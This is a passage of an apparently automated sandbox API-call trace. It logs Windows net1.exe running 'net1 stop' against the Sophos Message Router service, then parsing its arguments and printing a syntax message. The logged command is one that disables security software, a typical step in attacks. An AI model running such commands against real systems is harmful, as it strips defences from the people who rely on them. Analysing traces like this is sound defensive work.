dwHighDateTime=0x1d57a86)) [0050.146] GetCurrentProcessId () returned 0xa18 [0050.146] GetCurrentThreadId () returned 0xa50 [0050.146] GetTickCount () returned 0x11471f5 [0050.146] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffda0 | out: lpPerformanceCount=0x2ffda0*=17043075981) returned 1 [0050.146] GetModuleHandleA (lpModuleName=0x0) returned 0xaf0000 [0050.146] __set_app_type (_Type=0x1) [0050.146] __p__fmode () returned 0x74eb31f4 [0050.146] __p__commode () returned 0x74eb31fc [0050.147] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xafffe6) returned 0x0 [0050.147] __getmainargs (in: _Argc=0xb09064, _Argv=0xb0906c, _Env=0xb09068, _DoWildCard=0, _StartInfo=0xb09024 | out: _Argc=0xb09064, _Argv=0xb0906c, _Env=0xb09068) returned 0 [0050.147] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0050.147] GetConsoleOutputCP () returned 0x1b5 [0050.147] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb09080 | out: lpCPInfo=0xb09080) returned 1 [0050.147] SetThreadUILanguage (LangId=0x0) returned 0x409 [0050.150] sprintf_s (in: _DstBuf=0x2ffd60, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0050.150] setlocale (category=0, locale=".437") returned="English_United States.437" [0050.152] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0050.152] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0050.152] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Message RouterΓÇ¥ /y" [0050.152] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ffb2c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0050.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x92) returned 0x694c00 [0050.153] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0050.153] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ffd30 | out: Buffer=0x2ffd30*=0x691c98) returned 0x0 [0050.153] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ffd30 | out: Buffer=0x2ffd30*=0x691cb0) returned 0x0 [0050.153] _fileno (_File=0x74eb2900) returned -2 [0050.153] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0050.153] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0050.153] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0050.153] _wcsicmp (_String1="config", _String2="stop") returned -16 [0050.153] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0050.153] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0050.153] _wcsicmp (_String1="file", _String2="stop") returned -13 [0050.153] _wcsicmp (_String1="files", _String2="stop") returned -13 [0050.153] _wcsicmp (_String1="group", _String2="stop") returned -12 [0050.153] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0050.153] _wcsicmp (_String1="help", _String2="stop") returned -11 [0050.153] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0050.153] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0050.153] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0050.153] _wcsicmp (_String1="session", _String2="stop") returned -15 [0050.153] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0050.153] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0050.153] _wcsicmp (_String1="share", _String2="stop") returned -12 [0050.153] _wcsicmp (_String1="start", _String2="stop") returned -14 [0050.153] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0050.154] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0050.154] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0050.154] _wcsicmp (_String1="accounts", _String2="ΓÇ£Sophos") returned -850 [0050.154] _wcsicmp (_String1="computer", _String2="ΓÇ£Sophos") returned -848 [0050.154] _wcsicmp (_String1="config", _String2="ΓÇ£Sophos") returned -848 [0050.154] _wcsicmp (_String1="continue", _String2="ΓÇ£Sophos") returned -848 [0050.154] _wcsicmp (_String1="cont", _String2="ΓÇ£Sophos") returned -848 [0050.154] _wcsicmp (_String1="file", _String2="ΓÇ£Sophos") returned -845 [0050.154] _wcsicmp (_String1="files", _String2="ΓÇ£Sophos") returned -845 [0050.154] _wcsicmp (_String1="group", _String2="ΓÇ£Sophos") returned -844 [0050.154] _wcsicmp (_String1="groups", _String2="ΓÇ£Sophos") returned -844 [0050.154] _wcsicmp (_String1="help", _String2="ΓÇ£Sophos") returned -843 [0050.154] _wcsicmp (_String1="helpmsg", _String2="ΓÇ£Sophos") returned -843 [0050.154] _wcsicmp (_String1="localgroup", _String2="ΓÇ£Sophos") returned -839 [0050.154] _wcsicmp (_String1="pause", _String2="ΓÇ£Sophos") returned -835 [0050.154] _wcsicmp (_String1="session", _String2="ΓÇ£Sophos") returned -832 [0050.154] _wcsicmp (_String1="sessions", _String2="ΓÇ£Sophos") returned -832 [0050.154] _wcsicmp (_String1="sess", _String2="ΓÇ£Sophos") returned -832 [0050.154] _wcsicmp (_String1="share", _String2="ΓÇ£Sophos") returned -832 [0050.154] _wcsicmp (_String1="start", _String2="ΓÇ£Sophos") returned -832 [0050.154] _wcsicmp (_String1="stats", _String2="ΓÇ£Sophos") returned -832 [0050.154] _wcsicmp (_String1="statistics", _String2="ΓÇ£Sophos") returned -832 [0050.154] _wcsicmp (_String1="stop", _String2="ΓÇ£Sophos") returned -832 [0050.154] _wcsicmp (_String1="time", _String2="ΓÇ£Sophos") returned -831 [0050.154] _wcsicmp (_String1="user", _String2="ΓÇ£Sophos") returned -830 [0050.154] _wcsicmp (_String1="users", _String2="ΓÇ£Sophos") returned -830 [0050.154] _wcsicmp (_String1="msg", _String2="ΓÇ£Sophos") returned -838 [0050.154] _wcsicmp (_String1="messenger", _String2="ΓÇ£Sophos") returned -838 [0050.154] _wcsicmp (_String1="receiver", _String2="ΓÇ£Sophos") returned -833 [0050.154] _wcsicmp (_String1="rcv", _String2="ΓÇ£Sophos") returned -833 [0050.154] _wcsicmp (_String1="netpopup", _String2="ΓÇ£Sophos") returned -837 [0050.154] _wcsicmp (_String1="redirector", _String2="ΓÇ£Sophos") returned -833 [0050.154] _wcsicmp (_String1="redir", _String2="ΓÇ£Sophos") returned -833 [0050.154] _wcsicmp (_String1="rdr", _String2="ΓÇ£Sophos") returned -833 [0050.154] _wcsicmp (_String1="workstation", _String2="ΓÇ£Sophos") returned -828 [0050.155] _wcsicmp (_String1="work", _String2="ΓÇ£Sophos") returned -828 [0050.155] _wcsicmp (_String1="wksta", _String2="ΓÇ£Sophos") returned -828 [0050.155] _wcsicmp (_String1="prdr", _String2="ΓÇ£Sophos") returned -835 [0050.155] _wcsicmp (_String1="devrdr", _String2="ΓÇ£Sophos") returned -847 [0050.155] _wcsicmp (_String1="lanmanworkstation", _String2="ΓÇ£Sophos") returned -839 [0050.155] _wcsicmp (_String1="server", _String2="ΓÇ£Sophos") returned -832 [0050.155] _wcsicmp (_String1="svr", _String2="ΓÇ£Sophos") returned -832 [0050.155] _wcsicmp (_String1="srv", _String2="ΓÇ£Sophos") returned -832 [0050.155] _wcsicmp (_String1="lanmanserver", _String2="ΓÇ£Sophos") returned -839 [0050.155] _wcsicmp (_String1="alerter", _String2="ΓÇ£Sophos") returned -850 [0050.155] _wcsicmp (_String1="netlogon", _String2="ΓÇ£Sophos") returned -837 [0050.155] _wcsicmp (_String1="accounts", _String2="Message") returned -12 [0050.155] _wcsicmp (_String1="computer", _String2="Message") returned -10 [0050.155] _wcsicmp (_String1="config", _String2="Message") returned -10 [0050.155] _wcsicmp (_String1="continue", _String2="Message") returned -10 [0050.155] _wcsicmp (_String1="cont", _String2="Message") returned -10 [0050.155] _wcsicmp (_String1="file", _String2="Message") returned -7 [0050.155] _wcsicmp (_String1="files", _String2="Message") returned -7 [0050.155] _wcsicmp (_String1="group", _String2="Message") returned -6 [0050.155] _wcsicmp (_String1="groups", _String2="Message") returned -6 [0050.155] _wcsicmp (_String1="help", _String2="Message") returned -5 [0050.155] _wcsicmp (_String1="helpmsg", _String2="Message") returned -5 [0050.155] _wcsicmp (_String1="localgroup", _String2="Message") returned -1 [0050.155] _wcsicmp (_String1="pause", _String2="Message") returned 3 [0050.155] _wcsicmp (_String1="session", _String2="Message") returned 6 [0050.155] _wcsicmp (_String1="sessions", _String2="Message") returned 6 [0050.155] _wcsicmp (_String1="sess", _String2="Message") returned 6 [0050.155] _wcsicmp (_String1="share", _String2="Message") returned 6 [0050.155] _wcsicmp (_String1="start", _String2="Message") returned 6 [0050.155] _wcsicmp (_String1="stats", _String2="Message") returned 6 [0050.155] _wcsicmp (_String1="statistics", _String2="Message") returned 6 [0050.155] _wcsicmp (_String1="stop", _String2="Message") returned 6 [0050.155] _wcsicmp (_String1="time", _String2="Message") returned 7 [0050.156] _wcsicmp (_String1="user", _String2="Message") returned 8 [0050.156] _wcsicmp (_String1="users", _String2="Message") returned 8 [0050.156] _wcsicmp (_String1="msg", _String2="Message") returned 14 [0050.156] _wcsicmp (_String1="messenger", _String2="Message") returned 4 [0050.156] _wcsicmp (_String1="receiver", _String2="Message") returned 5 [0050.156] _wcsicmp (_String1="rcv", _String2="Message") returned 5 [0050.156] _wcsicmp (_String1="netpopup", _String2="Message") returned 1 [0050.156] _wcsicmp (_String1="redirector", _String2="Message") returned 5 [0050.156] _wcsicmp (_String1="redir", _String2="Message") returned 5 [0050.156] _wcsicmp (_String1="rdr", _String2="Message") returned 5 [0050.156] _wcsicmp (_String1="workstation", _String2="Message") returned 10 [0050.156] _wcsicmp (_String1="work", _String2="Message") returned 10 [0050.156] _wcsicmp (_String1="wksta", _String2="Message") returned 10 [0050.156] _wcsicmp (_String1="prdr", _String2="Message") returned 3 [0050.156] _wcsicmp (_String1="devrdr", _String2="Message") returned -9 [0050.156] _wcsicmp (_String1="lanmanworkstation", _String2="Message") returned -1 [0050.156] _wcsicmp (_String1="server", _String2="Message") returned 6 [0050.156] _wcsicmp (_String1="svr", _String2="Message") returned 6 [0050.156] _wcsicmp (_String1="srv", _String2="Message") returned 6 [0050.156] _wcsicmp (_String1="lanmanserver", _String2="Message") returned -1 [0050.156] _wcsicmp (_String1="alerter", _String2="Message") returned -12 [0050.156] _wcsicmp (_String1="netlogon", _String2="Message") returned 1 [0050.156] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0050.156] SetThreadUILanguage (LangId=0x0) returned 0x409 [0050.157] wcscpy_s (in: _Destination=0x2ff830, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0050.157] LoadLibraryW (lpLibFileName="neth.dll") returned 0x73c40000 [0050.157] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x2ff82c, nSize=0x0, Arguments=0x2ff828 | out: lpBuffer="叨ineth.dll") returned 0xff [0050.159] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0050.159] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0050.159] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0050.159] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0050.159] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0050.159] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0050.159] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0050.159] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0050.159] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0050.159] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0050.159] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0050.159] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0050.159] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0050.159] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0050.159] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0050.159] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0050.159] _wcsicmp (_String1="CONT", _String2="ΓÇ£Sophos") returned -848 [0050.159] _wcsicmp (_String1="CONT", _String2="Message") returned -10 [0050.159] _wcsicmp (_String1="CONT", _String2="RouterΓÇ¥") returned -15 [0050.159] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0050.159] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0050.159] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0050.159] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0050.159] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0050.159] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0050.159] _wcsicmp (_String1="FILES", _String2="ΓÇ£Sophos") returned -845 [0050.159] _wcsicmp (_String1="FILES", _String2="Message") returned -7 [0050.159] _wcsicmp (_String1="FILES", _String2="RouterΓÇ¥") returned -12 [0050.159] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0050.159] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0050.159] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0050.159] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0050.159] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0050.160] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0050.160] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Sophos") returned -844 [0050.160] _wcsicmp (_String1="GROUPS", _String2="Message") returned -6 [0050.160] _wcsicmp (_String1="GROUPS", _String2="RouterΓÇ¥") returned -11 [0050.160] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0050.160] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0050.160] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0050.160] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0050.160] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0050.160] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0050.160] _wcsicmp (_String1="REPL", _String2="ΓÇ£Sophos") returned -833 [0050.160] _wcsicmp (_String1="REPL", _String2="Message") returned 5 [0050.160] _wcsicmp (_String1="REPL", _String2="RouterΓÇ¥") returned -10 [0050.160] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0050.160] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0050.160] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0050.160] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Sophos") returned -833 [0050.160] _wcsicmp (_String1="REPLICATOR", _String2="Message") returned 5 [0050.160] _wcsicmp (_String1="REPLICATOR", _String2="RouterΓÇ¥") returned -10 [0050.160] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0050.160] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0050.160] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0050.160] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0050.160] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0050.160] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0050.160] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Sophos") returned -832 [0050.160] _wcsicmp (_String1="SESSIONS", _String2="Message") returned 6 [0050.160] _wcsicmp (_String1="SESSIONS", _String2="RouterΓÇ¥") returned 1 [0050.160] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0050.160] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0050.160] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0050.160] _wcsicmp (_String1="SESS", _String2="ΓÇ£Sophos") returned -832 [0050.160] _wcsicmp (_String1="SESS", _String2="Message") returned 6 [0050.160] _wcsicmp (_String1="SESS", _String2="RouterΓÇ¥") returned 1 [0050.160] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0050.160] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0050.161] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0050.161] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0050.161] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0050.161] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0050.161] _wcsicmp (_String1="STATS", _String2="ΓÇ£Sophos") returned -832 [0050.161] _wcsicmp (_String1="STATS", _String2="Message") returned 6 [0050.161] _wcsicmp (_String1="STATS", _String2="RouterΓÇ¥") returned 1 [0050.161] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0050.161] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0050.161] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0050.161] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0050.161] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0050.161] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0050.161] _wcsicmp (_String1="USERS", _String2="ΓÇ£Sophos") returned -830 [0050.161] _wcsicmp (_String1="USERS", _String2="Message") returned 8 [0050.161] _wcsicmp (_String1="USERS", _String2="RouterΓÇ¥") returned 3 [0050.161] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0050.161] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0050.161] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0050.161] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0050.161] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0050.161] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0050.161] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Sophos") returned -833 [0050.161] _wcsicmp (_String1="REDIRECTOR", _String2="Message") returned 5 [0050.161] _wcsicmp (_String1="REDIRECTOR", _String2="RouterΓÇ¥") returned -10 [0050.161] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0050.161] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0050.161] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0050.161] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Sophos") returned -833 [0050.161] _wcsicmp (_String1="REDIR", _String2="Message") returned 5 [0050.161] _wcsicmp (_String1="REDIR", _String2="RouterΓÇ¥") returned -10 [0050.161] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0050.161] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0050.161] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0050.161] _wcsicmp (_String1="RDR", _String2="ΓÇ£Sophos") returned -833 [0050.161] _wcsicmp (_String1="RDR", _String2="Message") returned 5 [0050.161] _wcsicmp (_String1="RDR", _String2="RouterΓÇ¥") returned -11 [0050.162] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0050.162] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0050.162] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0050.162] _wcsicmp (_String1="WORK", _String2="ΓÇ£Sophos") returned -828 [0050.162] _wcsicmp (_String1="WORK", _String2="Message") returned 10 [0050.162] _wcsicmp (_String1="WORK", _String2="RouterΓÇ¥") returned 5 [0050.162] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0050.162] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0050.162] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0050.162] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Sophos") returned -828 [0050.162] _wcsicmp (_String1="WKSTA", _String2="Message") returned 10 [0050.162] _wcsicmp (_String1="WKSTA", _String2="RouterΓÇ¥") returned 5 [0050.162] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0050.162] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0050.162] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0050.162] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Sophos") returned -835 [0050.162] _wcsicmp (_String1="PRDR", _String2="Message") returned 3 [0050.162] _wcsicmp (_String1="PRDR", _String2="RouterΓÇ¥") returned -2 [0050.162] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0050.162] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0050.162] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0050.162] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Sophos") returned -847 [0050.162] _wcsicmp (_String1="DEVRDR", _String2="Message") returned -9 [0050.162] _wcsicmp (_String1="DEVRDR", _String2="RouterΓÇ¥") returned -14 [0050.162] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0050.162] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0050.162] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0050.162] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0050.162] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0050.162] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0050.162] _wcsicmp (_String1="SVR", _String2="ΓÇ£Sophos") returned -832 [0050.162] _wcsicmp (_String1="SVR", _String2="Message") returned 6 [0050.162] _wcsicmp (_String1="SVR", _String2="RouterΓÇ¥") returned 1 [0050.162] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0050.162] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0050.162] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0050.162] _wcsicmp (_String1="SRV", _String2="ΓÇ£Sophos") returned -832 [0050.162] _wcsicmp (_String1="SRV", _String2="Message") returned 6 [0050.163] _wcsicmp (_String1="SRV", _String2="RouterΓÇ¥") returned 1 [0050.163] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0050.163] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73c40000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x2ff82c, nSize=0x0, Arguments=0x2ff828 | out: lpBuffer="嗰iꔺ瓡") returned 0x1c [0050.163] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0050.163] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0050.163] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0050.163] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0050.163] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0050.163] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0050.163] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0050.163] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0050.163] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0050.163] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0050.163] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0050.163] wcscpy_s (in: _Destination=0xb0a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0050.163] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73c30000 [0050.164] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73c30000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0xb0b338, nSize=0x800, Arguments=0xb09dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0050.164] GetFileType (hFile=0x26c) returned 0x3 [0050.164] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x693c18 [0050.164] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x693c18, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0050.164] WriteFile (in: hFile=0x26c, lpBuffer=0x693c18*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ff80c, lpOverlapped=0x0 | out: lpBuffer=0x693c18*, lpNumberOfBytesWritten=0x2ff80c*=0x20, lpOverlapped=0x0) returned 1 [0050.164] LocalFree 